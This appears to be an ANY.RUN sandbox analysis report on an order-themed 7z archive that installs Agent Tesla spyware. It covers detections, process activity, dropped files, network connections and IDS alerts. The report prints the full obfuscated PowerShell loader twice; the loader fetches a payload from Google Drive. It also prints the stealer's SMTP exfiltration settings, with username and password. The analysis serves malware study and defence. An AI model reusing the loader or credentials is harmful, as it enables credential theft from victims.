File name:

ORDERSTBK05047.7z

Full analysis: https://app.any.run/tasks/3be19a13-c8ba-47c8-b8ab-60d02783be0a
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.

Malware Trends Tracker     >>>
Analysis date: May 31, 2024, 11:58:10
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
evasion
agenttesla
stealer
exfiltration
smtp
Indicators:
MIME: application/x-7z-compressed
File info: 7-zip archive data, version 0.4
MD5:

6C73028AC713DEC9C31C3673F92461EF

SHA1:

CAC1F7725B737FB44732C719FD2BB32A8F1E3912

SHA256:

4C4A03AEBBBAA3762A8405A1B21E560EB633528C4C1C2E6A8F9AED3E4B1FEB8C

SSDEEP:

96:v5rHMDST0SYuemKQTKUBJ1sIaS+U/Gre8yrtrLOsyXSdL:vJHOgYNYbeXSL/rr1fdL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • AGENTTESLA has been detected (YARA)

      • wab.exe (PID: 5108)

    • Actions looks like stealing of personal data

      • wab.exe (PID: 5108)

    • Steals credentials from Web Browsers

      • wab.exe (PID: 5108)

    • Scans artifacts that could help determine the target

      • wab.exe (PID: 5108)

  • SUSPICIOUS

    • Accesses WMI object, sets custom ImpersonationLevel (SCRIPT)

      • wscript.exe (PID: 6812)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6936)
      • powershell.exe (PID: 7140)

    • Accesses WMI object display name (SCRIPT)

      • wscript.exe (PID: 6812)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 6936)
      • powershell.exe (PID: 7140)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6812)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6812)
      • powershell.exe (PID: 6936)

    • Accesses system date via WMI (SCRIPT)

      • wscript.exe (PID: 6812)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 7140)

    • Reads security settings of Internet Explorer

      • wab.exe (PID: 5108)

    • Connects to SMTP port

      • wab.exe (PID: 5108)

    • Checks Windows Trust Settings

      • wab.exe (PID: 5108)

  • INFO

    • Disables trace logs

      • powershell.exe (PID: 6936)
      • wab.exe (PID: 5108)

    • Manual execution by a user

      • wscript.exe (PID: 6812)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 6936)
      • powershell.exe (PID: 7140)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6936)
      • powershell.exe (PID: 7140)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 7140)
      • powershell.exe (PID: 6936)

    • Checks proxy server information

      • powershell.exe (PID: 6936)
      • wab.exe (PID: 5108)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7140)

    • Reads the computer name

      • wab.exe (PID: 5108)

    • Checks supported languages

      • wab.exe (PID: 5108)

    • Reads the software policy settings

      • wab.exe (PID: 5108)

    • Reads Microsoft Office registry keys

      • wab.exe (PID: 5108)

    • Reads the machine GUID from the registry

      • wab.exe (PID: 5108)

    • Reads Environment values

      • wab.exe (PID: 5108)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AgentTesla

(PID) Process(5108) wab.exe
Protocolsmtp
Hostsmtp.bluegatehomecares.com
Port587
Usernamenicholas.l@bluegatehomecares.com
PasswordGUHTugT7
No Malware configuration.

TRiD

.7z | 7-Zip compressed archive (v0.4) (57.1)
.7z | 7-Zip compressed archive (gen) (42.8)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
124
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs wscript.exe no specs powershell.exe conhost.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs #AGENTTESLA wab.exe

Process information

PID
CMD
Path
Indicators
Parent process
3728"C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Inkluderingens.Kas && echo t"C:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
5108"C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\Windows Mail\wab.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
AgentTesla
(PID) Process(5108) wab.exe
Protocolsmtp
Hostsmtp.bluegatehomecares.com
Port587
Usernamenicholas.l@bluegatehomecares.com
PasswordGUHTugT7
6320"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\ORDERSTBK05047.7zC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
6812"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\Desktop\ORDER STBK05047.vbe" C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6936"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Gdningsopbevaringerne='S';$Gdningsopbevaringerne+='ubs';$Gdningsopbevaringerne+='tri';$oceanologic = 1;$Gdningsopbevaringerne+='ng';Function Rubidumets($Ujordiskes){$udraab=$Ujordiskes.Length-$oceanologic;For( $Bentlee=1;$Bentlee -lt $udraab;$Bentlee+=2){$enhedstryk+=$Ujordiskes.$Gdningsopbevaringerne.Invoke( $Bentlee, $oceanologic);}$enhedstryk;}function Burgout($Tillgsmandatet){ . ($sigrid) ($Tillgsmandatet);}$Refroze=Rubidumets 'KMKo z i lslFaB/ 5B.N0 A(.WRi,n d oKw sK NATN M1 0O.S0G;L WBi,n 6 4C; xU6a4H;L DrCv,: 1K2 1,.S0B)S G.eLcrkVoD/S2P0P1T0 0,1M0 1M .Fii rFe fNoLx /,1 2S1P.,0 ';$Unseasonably=Rubidumets 'CU s eMrK- A.g eCnUtO ';$skyteren=Rubidumets 'UhUtvtSpUsT:,/ /BdPr i vOeI.CgHo,oFg.l eD.McgoAm,/ u.cK?We.xGpro rOtG=Dd,o w nLlPoGaBdW&Ai,d,=,1 UPJ,8 pWLHzCXSw.oSk aUr.wFsR8 _ Y r 5,kCJBTSI k l C,vtrCdPV - I ';$Smeltman=Rubidumets ',>U ';$sigrid=Rubidumets 'Pi.eKx ';$undominative='Blueweeds';$Kaes = Rubidumets ',eAc h o O% aupSpTdfaAtSaN%H\VI n k,lPuMddeFrKi,nRgfe nTs . KAa s, ,&K&d emc.hFo Dt ';Burgout (Rubidumets ' $tg l o bNaCl :.H eusBt e.vRdwd.e l.b.=T(Vc mTdt s/AcP $ K aIe s.), ');Burgout (Rubidumets ' $Sgrl oCbsaKlU:AI n,k.a,s.sCo.sRa.lrr.sr1M0A9.=S$Us kZy t e rRe n ..s p.l.ist (T$FS mCe l t mSa n ) ');$skyteren=$Inkassosalrs109[0];$Illusionslse= (Rubidumets ' $IgMl oFb,aGlN: H a.a.n dMvCrCkSs,b a g e,rkeKn =UN eBwF-FO bUjteSc,t, BS,yPs,t e m..,NBe t,. WVeHbLCZlMiNeDnTt');$Illusionslse+=$Hestevddelb[1];Burgout ($Illusionslse);Burgout (Rubidumets ',$DH aJaMnRdCvPr k,sEb,a gRe rSeFn . HWe,a.dGe,rSsF[A$,USn s eQaFs,oKnSaDbDl.ys]B= $.R,eTf rOoVz eT ');$Tivolierne=Rubidumets 'W$,H.a.a nSdTvRrAk sHbPa gTeTrbe n .bD oCwEn,lSo audSFIi l.eO(U$Ps.k y t,eTr ePn ,L$ r kGe,hFeEr tCu g e r s )s ';$rkehertugers=$Hestevddelb[0];Burgout (Rubidumets 'D$Sg laoNb,aGl :IKSl o sS= (.T eLsBtR- PTa,tghF l$Ur.kFe h e r,t.u g e rPsC)S ');while (!$Klos) {Burgout (Rubidumets '.$ g l.oSbIaGl,:UAFl tAs t e,mMm emr nGeCsF=S$Lt r,uPeW ') ;Burgout $Tivolierne;Burgout (Rubidumets 'DS tRaFr.tG-.SRl eAe p, T4 ');Burgout (Rubidumets '.$,gGl o b.a,l.:KK lDo ss=.( T eas,tG-.PSaStBhH $sr.kae,hUe.rDt u gKe r sD) ') ;Burgout (Rubidumets 'T$,g.lVo.b,aAlA:EKHa d.m iCuKm e.tTs = $ gSlGo bVa lS:PBDr u s,k + +G%,$.I nCk.a sgs oDsUa,l rAsN1 0S9..Mc o usnStS ') ;$skyteren=$Inkassosalrs109[$Kadmiumets];}$Intersected=357313;$pipy=26939;Burgout (Rubidumets 'C$.gVl o b a lP: CMa t gluBtBtBeSn. R=, UG e tE-.C oFnAt.e.n t, $Ar k e h eEr.tSu.g e rSs ');Burgout (Rubidumets 'C$ g lCoDb aRl,: R,h e aFd,i,nNeB S= ,[SS,y.sKt,eNm.. C o n v ePr t ]H:.: FUr oGm.BUa s eS6 4HSPtGr i nNg,( $AC aEtAg uSt t e nS)a ');Burgout (Rubidumets 'B$DgTl.oLb atl :,TMo tIa l fGoDrUsUiSk r i n.g.eMrIn e, ,= .[,SUy sBt eAmE. T ehxKtW..E,nBc oCd iKn gF]T:,:SAMS.CMIFIK.BG.e tRSUtOrAiHnGg (F$HR,hVeHa dAiSn,eR)i ');Burgout (Rubidumets ' $Mgsl osbEaTl : FTlraPvUo b.aSc.t e.rUi u mG=E$,TDo t.aElAfKo r sSi kNrIiLn gDe.rPnFe,.EsPu bDs.t.r iSnKg,(R$.I.nPtSeSr sMeTcUtSeCd ,L$Up i.pRyP). ');Burgout $Flavobacterium;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6944\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7068"C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Inkluderingens.Kas && echo t"C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
7140"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Gdningsopbevaringerne='S';$Gdningsopbevaringerne+='ubs';$Gdningsopbevaringerne+='tri';$oceanologic = 1;$Gdningsopbevaringerne+='ng';Function Rubidumets($Ujordiskes){$udraab=$Ujordiskes.Length-$oceanologic;For( $Bentlee=1;$Bentlee -lt $udraab;$Bentlee+=2){$enhedstryk+=$Ujordiskes.$Gdningsopbevaringerne.Invoke( $Bentlee, $oceanologic);}$enhedstryk;}function Burgout($Tillgsmandatet){ . ($sigrid) ($Tillgsmandatet);}$Refroze=Rubidumets 'KMKo z i lslFaB/ 5B.N0 A(.WRi,n d oKw sK NATN M1 0O.S0G;L WBi,n 6 4C; xU6a4H;L DrCv,: 1K2 1,.S0B)S G.eLcrkVoD/S2P0P1T0 0,1M0 1M .Fii rFe fNoLx /,1 2S1P.,0 ';$Unseasonably=Rubidumets 'CU s eMrK- A.g eCnUtO ';$skyteren=Rubidumets 'UhUtvtSpUsT:,/ /BdPr i vOeI.CgHo,oFg.l eD.McgoAm,/ u.cK?We.xGpro rOtG=Dd,o w nLlPoGaBdW&Ai,d,=,1 UPJ,8 pWLHzCXSw.oSk aUr.wFsR8 _ Y r 5,kCJBTSI k l C,vtrCdPV - I ';$Smeltman=Rubidumets ',>U ';$sigrid=Rubidumets 'Pi.eKx ';$undominative='Blueweeds';$Kaes = Rubidumets ',eAc h o O% aupSpTdfaAtSaN%H\VI n k,lPuMddeFrKi,nRgfe nTs . KAa s, ,&K&d emc.hFo Dt ';Burgout (Rubidumets ' $tg l o bNaCl :.H eusBt e.vRdwd.e l.b.=T(Vc mTdt s/AcP $ K aIe s.), ');Burgout (Rubidumets ' $Sgrl oCbsaKlU:AI n,k.a,s.sCo.sRa.lrr.sr1M0A9.=S$Us kZy t e rRe n ..s p.l.ist (T$FS mCe l t mSa n ) ');$skyteren=$Inkassosalrs109[0];$Illusionslse= (Rubidumets ' $IgMl oFb,aGlN: H a.a.n dMvCrCkSs,b a g e,rkeKn =UN eBwF-FO bUjteSc,t, BS,yPs,t e m..,NBe t,. WVeHbLCZlMiNeDnTt');$Illusionslse+=$Hestevddelb[1];Burgout ($Illusionslse);Burgout (Rubidumets ',$DH aJaMnRdCvPr k,sEb,a gRe rSeFn . HWe,a.dGe,rSsF[A$,USn s eQaFs,oKnSaDbDl.ys]B= $.R,eTf rOoVz eT ');$Tivolierne=Rubidumets 'W$,H.a.a nSdTvRrAk sHbPa gTeTrbe n .bD oCwEn,lSo audSFIi l.eO(U$Ps.k y t,eTr ePn ,L$ r kGe,hFeEr tCu g e r s )s ';$rkehertugers=$Hestevddelb[0];Burgout (Rubidumets 'D$Sg laoNb,aGl :IKSl o sS= (.T eLsBtR- PTa,tghF l$Ur.kFe h e r,t.u g e rPsC)S ');while (!$Klos) {Burgout (Rubidumets '.$ g l.oSbIaGl,:UAFl tAs t e,mMm emr nGeCsF=S$Lt r,uPeW ') ;Burgout $Tivolierne;Burgout (Rubidumets 'DS tRaFr.tG-.SRl eAe p, T4 ');Burgout (Rubidumets '.$,gGl o b.a,l.:KK lDo ss=.( T eas,tG-.PSaStBhH $sr.kae,hUe.rDt u gKe r sD) ') ;Burgout (Rubidumets 'T$,g.lVo.b,aAlA:EKHa d.m iCuKm e.tTs = $ gSlGo bVa lS:PBDr u s,k + +G%,$.I nCk.a sgs oDsUa,l rAsN1 0S9..Mc o usnStS ') ;$skyteren=$Inkassosalrs109[$Kadmiumets];}$Intersected=357313;$pipy=26939;Burgout (Rubidumets 'C$.gVl o b a lP: CMa t gluBtBtBeSn. R=, UG e tE-.C oFnAt.e.n t, $Ar k e h eEr.tSu.g e rSs ');Burgout (Rubidumets 'C$ g lCoDb aRl,: R,h e aFd,i,nNeB S= ,[SS,y.sKt,eNm.. C o n v ePr t ]H:.: FUr oGm.BUa s eS6 4HSPtGr i nNg,( $AC aEtAg uSt t e nS)a ');Burgout (Rubidumets 'B$DgTl.oLb atl :,TMo tIa l fGoDrUsUiSk r i n.g.eMrIn e, ,= .[,SUy sBt eAmE. T ehxKtW..E,nBc oCd iKn gF]T:,:SAMS.CMIFIK.BG.e tRSUtOrAiHnGg (F$HR,hVeHa dAiSn,eR)i ');Burgout (Rubidumets ' $Mgsl osbEaTl : FTlraPvUo b.aSc.t e.rUi u mG=E$,TDo t.aElAfKo r sSi kNrIiLn gDe.rPnFe,.EsPu bDs.t.r iSnKg,(R$.I.nPtSeSr sMeTcUtSeCd ,L$Up i.pRyP). ');Burgout $Flavobacterium;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
Total events
20 035
Read events
19 970
Write events
65
Delete events
0

Modification events

(PID) Process:(6320) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(6320) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(6320) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\GoogleChromeEnterpriseBundle64.zip
(PID) Process:(6320) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\ORDERSTBK05047.7z
(PID) Process:(6320) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(6320) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(6320) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(6320) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(6320) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\3c\52C64B7E
Operation:writeName:@C:\WINDOWS\System32\wshext.dll,-4803
Value:
VBScript Encoded Script File
(PID) Process:(6320) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\MainWin
Operation:writeName:Placement
Value:
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF41010000370000000105000020020000
Executable files
0
Suspicious files
2
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
6936powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mkhacmfk.dxw.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6936powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yfez4bbv.0ei.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6936powershell.exeC:\Users\admin\AppData\Roaming\Inkluderingens.Kastext
MD5:05E4C79B0B2AD035DD119722584D0CEC
SHA256:051F53541631903CD249457F9D175809933D0B0CB64A7D8635F692807B2C52E0
6320WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa6320.1619\ORDER STBK05047.vbetext
MD5:91900494367AE31225B981F72908861A
SHA256:C9712BA57F4A28529F198F85185717F9607E1301C69CB565C839B7E9476E52EC
7140powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:8E7D26D71A1CAF822C338431F0651251
SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
7140powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_izodhed1.b3p.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7140powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wdb5rqcz.tlj.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6936powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:609B1ADBE874C55FF6B5E44BED42B842
SHA256:6AD0114DAEFE2E3F21158CF0358DAE69D6F77665998B439E4D95637CDCB1767C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
28
DNS requests
8
Threats
9

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5612
RUXIMICS.exe
GET
200
62.115.252.171:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
ES
binary
1.01 Kb
unknown
5952
svchost.exe
GET
200
2.21.189.233:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
GB
binary
973 b
unknown
5140
MoUsoCoreWorker.exe
GET
200
62.115.252.171:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
ES
binary
1.01 Kb
unknown
5952
svchost.exe
GET
200
62.115.252.171:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
ES
binary
1.01 Kb
unknown
GET
303
172.217.18.4:443
https://drive.google.com/uc?export=download&id=1AMlHX4HR0UUC-ocvsIO4liygCQUyuGgC
US
unknown
5612
RUXIMICS.exe
GET
200
2.21.189.233:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
GB
binary
973 b
unknown
GET
303
172.217.18.4:443
https://drive.google.com/uc?export=download&id=1UJ8pLzXwokarws8_Yr5kJTIklCvrdV-I
US
unknown
5140
MoUsoCoreWorker.exe
GET
200
2.21.189.233:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
GB
binary
973 b
unknown
GET
200
142.250.185.193:443
https://drive.usercontent.google.com/download?id=1UJ8pLzXwokarws8_Yr5kJTIklCvrdV-I&export=download
US
text
500 Kb
unknown
GET
200
142.250.185.193:443
https://drive.usercontent.google.com/download?id=1AMlHX4HR0UUC-ocvsIO4liygCQUyuGgC&export=download
US
binary
234 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
unknown
5952
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5612
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5140
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
239.255.255.250:1900
unknown
5612
RUXIMICS.exe
62.115.252.171:80
crl.microsoft.com
Telia Company AB
ES
unknown
5140
MoUsoCoreWorker.exe
62.115.252.171:80
crl.microsoft.com
Telia Company AB
ES
unknown
5952
svchost.exe
62.115.252.171:80
crl.microsoft.com
Telia Company AB
ES
unknown
4
System
192.168.100.255:137
whitelisted
5612
RUXIMICS.exe
2.21.189.233:80
www.microsoft.com
Akamai International B.V.
GB
unknown

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 62.115.252.171
  • 62.115.252.162
whitelisted
www.microsoft.com
  • 2.21.189.233
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
drive.google.com
  • 142.250.181.238
shared
drive.usercontent.google.com
  • 216.58.212.129
unknown
api.ipify.org
  • 104.26.13.205
  • 172.67.74.152
  • 104.26.12.205
shared
smtp.bluegatehomecares.com
  • 208.91.199.224
  • 208.91.199.225
  • 208.91.198.143
  • 208.91.199.223
unknown
self.events.data.microsoft.com
  • 52.182.143.214
whitelisted

Threats

PID
Process
Class
Message
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
Potential Corporate Privacy Violation
ET POLICY Possible IP Check api.ipify.org
Misc activity
ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
A Network Trojan was detected
STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP)
A Network Trojan was detected
ET MALWARE AgentTesla Exfil Via SMTP
Misc activity
INFO [ANY.RUN] SMTP email client opens transfer with server (EHLO)
3 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
ORDERSTBK05047.7z